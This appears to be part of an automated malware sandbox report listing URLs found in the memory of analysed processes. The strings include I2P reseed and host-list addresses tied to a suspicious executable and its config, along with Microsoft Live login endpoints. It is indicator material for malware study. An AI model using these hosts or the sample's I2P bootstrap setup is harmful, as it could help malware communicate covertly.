Source: svchost.exe, 0000001F.00000002.3263426432.000001D379836000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263588064.000001D37988F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb:pp
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/tb_
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
Source: svchost.exe, 0000001F.00000002.3262697506.000001D378AC7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdes
Source: svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsds
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3262754497.000001D378AD2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3036974940.000001D379352000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd$
Source: svchost.exe, 0000001F.00000003.3143580946.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143291121.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156389621.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112272695.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183931947.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143546975.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263042958.000001D379310000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3156417903.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183773272.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184036782.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3130778572.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111301830.000001D379307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111317881.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183261030.000001D379308000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183958551.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3184178913.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143745371.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199403669.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAA
Source: svchost.exe, 0000001F.00000003.3130435099.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 0000001F.00000003.3037162349.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdmlns:
Source: svchost.exe, 0000001F.00000002.3263271717.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3143492582.000001D37937A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183985353.000001D37937C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183713515.000001D37937C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsds
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://identiguy.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263392705.000001D379813000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://passport.net/tb
Source: update.pkg.11.drString found in binary or memory: http://reg.i2p/hosts.txt
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://reg.i2p/hosts.txt9
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://rus.i2p/hosts.txt
Source: svchost.exe, 0000001F.00000003.3111493334.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111460681.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3112006865.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111952207.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3111425069.000001D37930E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: svchost.exe, 0000001F.00000002.3263129207.000001D379337000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policysrf
Source: svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scn
Source: svchost.exe, 0000001F.00000002.3263196941.000001D37935F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199322434.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3183904232.000001D37930F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263092922.000001D379313000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issuee
Source: svchost.exe, 0000001F.00000003.3111366178.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3121387179.000001D379366000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 0000001F.00000003.3199377490.000001D37936D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000002.3263235797.000001D37936F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3199443216.000001D37936E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: update.pkg.11.drString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txtF&P#
Source: main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3261726260.00000270D3CED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.drString found in binary or memory: http://stats.i2p/cgi-bin/newhosts.txt
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023913746.000001D37934D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023950758.000001D379357000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://account.live.com/msangcwam
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://banana.incognet.io/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://banana.incognet.io/p
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://i2p.ghativega.in/
Source: main.exe, 00000016.00000002.3155678668.00000223502E7000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000016.00000003.2471613149.00000223502F9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://i2p.ghativega.in/b.c
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | String found in binary or memory: https://i2p.mooo.com/netDb/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://i2p.novg.net/
Source: main.exe, 00000016.00000002.3155678668.000002235025D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://i2p.novg.net/:
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: main.exe, 00000020.00000002.3262053344.00000270D3D82000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.3263308068.00007FF8A8C54000.00000002.00000001.01000000.0000000C.sdmp, update.pkg.11.dr | String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: main.exe, 00000020.00000002.3262201152.00000270D4100000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://i2pseed.creativecowpat.net:8443/G
Source: shdpeqdz2a54sj46ur0.exe, 0000000B.00000002.2510930956.00007FF76A97E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000016.00000002.3155007370.000002234FE24000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.22.dr, update.pkg.11.dr | String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: svchost.exe, 0000001F.00000002.3262816840.000001D378B02000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live
Source: svchost.exe, 0000001F.00000002.3263489218.000001D379854000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ApproveSession.srfs
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000003.3024091052.000001D379356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D379329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023799636.000001D379352000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3024014344.000001D37936B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023697164.000001D37932C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 0000001F.00000002.3262495369.000001D378A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageApprover.srfr.srf
Source: svchost.exe, 0000001F.00000002.3262531893.000001D378A5E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023982986.000001D379363000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 0000001F.00000003.3023966604.000001D379340000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000001F.00000003.3023930406.000001D37933B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/ManageLoginKeys.srfrf
